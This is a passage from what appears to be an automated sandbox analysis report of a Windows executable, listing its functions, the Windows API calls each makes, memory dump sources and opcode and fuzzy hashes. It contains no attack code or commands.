                                                                                                                                                  • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                                                                                                                                  Function 00466D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                                                                                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                                                  • String ID: nul
                                                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                                                  • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                                                                                  • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                                                                                                                                  • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                                                                                  • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                                                                                                                                  Function 00466E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                                                                                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                                                  • String ID: nul
                                                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                                                  • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                                                                                  • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                                                                                                                                  • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                                                                                  • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                                                                                                                                  Function 0046AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                                                                                                                                  • __swprintf.LIBCMT ref: 0046ACC1
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                  • String ID: %lu
                                                                                                                                                  • API String ID: 3164766367-685833217
                                                                                                                                                  • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                                                                                                  • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                                                                                                                                  • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                                                                                                  • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                                                                                                                                  Function 00461142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                                                  • String ID: @F
                                                                                                                                                  • API String ID: 2875609808-2781531706
                                                                                                                                                  • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                                                                                  • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                                                                                                                                  • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                                                                                  • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                                                                                                                                  Function 00AB3FC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AB3F73,00000003,?,00AB3F13,00000003,00ACDE80,0000000C,00AB403D,00000003,00000002), ref: 00AB3FE2
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AB3FF5
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00AB3F73,00000003,?,00AB3F13,00000003,00ACDE80,0000000C,00AB403D,00000003,00000002,00000000), ref: 00AB4018
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                  • Opcode ID: 708e49359d112647e9006b2596631d1b31e114d468a6834158fd44bc0e2f1ee5
                                                                                                                                                  • Instruction ID: fe32a61057fda39284c15338cf40d7153eefe9a7317f008a6c46c6b9947e3d89
                                                                                                                                                  • Opcode Fuzzy Hash: 708e49359d112647e9006b2596631d1b31e114d468a6834158fd44bc0e2f1ee5
                                                                                                                                                  • Instruction Fuzzy Hash: 24F0443090121CBBCB11DF95DC0ABDDBFB9EB18751F000158F805A2262DB755A45DA91
                                                                                                                                                  Function 0047EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                                                                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2364364464-0
                                                                                                                                                  • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                                                                                                  • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                                                                                                                                  • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                                                                                                  • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                                                                                                                                  Function 00480037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3440857362-0
                                                                                                                                                  • Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                                                                                                  • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                                                                                                                                  • Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                                                                                                  • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                                                                                                                                  Function 0046E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1389676194-0
                                                                                                                                                  • Opcode ID: 8f2ae4a4443c6bc7a9da2abdf3aecd68817ef5b13d258d4547a7daef5705853c
                                                                                                                                                  • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                                                                                                                                  • Opcode Fuzzy Hash: 8f2ae4a4443c6bc7a9da2abdf3aecd68817ef5b13d258d4547a7daef5705853c
                                                                                                                                                  • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                                                                                                                                  Function 0048A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                                                                                                  • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                                                                                                                                  • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                                                                                                  • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                                                                                                                                  Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00402357
                                                                                                                                                  • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4210589936-0
                                                                                                                                                  • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                                                                                                  • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                                                                                                                                  • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                                                                                                  • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                                                                                                                                  Function 004563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                                                                                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0045645C
                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00456466
                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2108273632-0
                                                                                                                                                  • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                                                                                                  • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                                                                                                                                  • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                                                                                                  • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                                                                                                                                  Function 00458A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00458A30
                                                                                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                                                                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3382505437-0
                                                                                                                                                  • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                                                                                                  • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                                                                                                                                  • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                                                                                                  • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                                                                                                                                  Function 0045B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0045B204
                                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                                                                                                                                  • _wcsstr.LIBCMT ref: 0045B289
                                                                                                                                                  Memory Dump Source
